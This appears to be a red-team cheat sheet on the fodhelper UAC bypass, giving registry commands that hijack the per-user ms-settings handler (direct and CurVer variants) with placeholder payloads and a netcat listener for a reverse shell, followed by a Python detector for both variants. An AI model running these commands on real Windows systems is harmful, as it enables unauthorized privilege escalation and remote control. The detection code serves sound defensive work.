>_ shadow.red

fodhelper UAC Bypass (AD context)


Direct ms-settings hijack

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "<base64 powershell -enc payload>" /f
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
fodhelper.exe
REG query HKCU\Software\Classes\ms-settings\Shell\Open\command

CurVer redirection variant

REG ADD "HKCU\Software\Classes\.thm\Shell\Open\command" /d "<encoded payload>" /f
REG ADD "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f

Listener and trigger

nc -nvlp 443
fodhelper.exe
whoami /all

In the whoami /all output, look for the Mandatory Label entry showing high integrity.
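
Detection view of the two variants above, as an added example that is not part of the original page: it scans registry value-set events for a per-user ms-settings open command (direct hijack) and for an ms-settings CurVer value pointing at a ProgID that has its own per-user open command (redirection). The event shape, the hive spellings and the "(Default)" value name are assumptions loosely modelled on Sysmon registry events, and every sample value is constructed.

```python
import re
from collections import defaultdict

# Per-user class hive spellings seen in registry telemetry (assumed forms).
CLASSES = re.compile(
    r"^(?:hkcu\\software\\classes|hku\\[^\\]+\\software\\classes"
    r"|hku\\[^\\]+_classes)\\(.+)$", re.I)
OPEN_CMD = "\\shell\\open\\command\\"

def find_ms_settings_overrides(events):
    """Return sorted (user, kind, progid) findings for per-user ms-settings overrides."""
    handlers = defaultdict(set)  # user -> ProgIDs with a per-user open command
    curver = {}                  # user -> ProgID that ms-settings\CurVer names
    for user, key, data in events:
        m = CLASSES.match(key)
        if not m:
            continue             # machine-wide or unrelated key
        path = m.group(1).lower()
        if path == "ms-settings\\curver\\(default)":
            curver[user] = data.lower()
        elif OPEN_CMD in path:
            handlers[user].add(path.split(OPEN_CMD)[0])
    findings = [(u, "direct", "ms-settings")
                for u, ids in handlers.items() if "ms-settings" in ids]
    for user, target in curver.items():
        # Order-independent: the handler may be written before or after CurVer.
        kind = "curver-redirect" if target in handlers[user] else "curver-only"
        findings.append((user, kind, target))
    return sorted(findings)

# Constructed events (user SID, value path, data); all values are made up.
A, B, C = "S-1-5-21-1111-1001", "S-1-5-21-1111-1002", "S-1-5-21-1111-1003"
SAMPLE = [
    (A, f"HKU\\{A}_Classes\\ms-settings\\Shell\\Open\\command\\(Default)", "<command>"),
    (A, f"HKU\\{A}_Classes\\ms-settings\\Shell\\Open\\command\\DelegateExecute", ""),
    (B, f"HKU\\{B}_Classes\\ms-settings\\CurVer\\(Default)", ".thm"),
    (B, f"HKU\\{B}_Classes\\.thm\\Shell\\Open\\command\\(Default)", "<command>"),
    (C, f"HKU\\{C}_Classes\\Applications\\notepad.exe\\shell\\open\\command\\(Default)",
     "notepad.exe %1"),
    (C, "HKLM\\SOFTWARE\\Classes\\ms-settings\\Shell\\Open\\command\\DelegateExecute",
     "{placeholder-clsid}"),
]

if __name__ == "__main__":
    for finding in find_ms_settings_overrides(SAMPLE):
        print(finding)
```

A "curver-only" finding means the redirect exists but no matching per-user handler was seen in the events supplied, which is still worth reviewing because ms-settings has no legitimate per-user override on a default install.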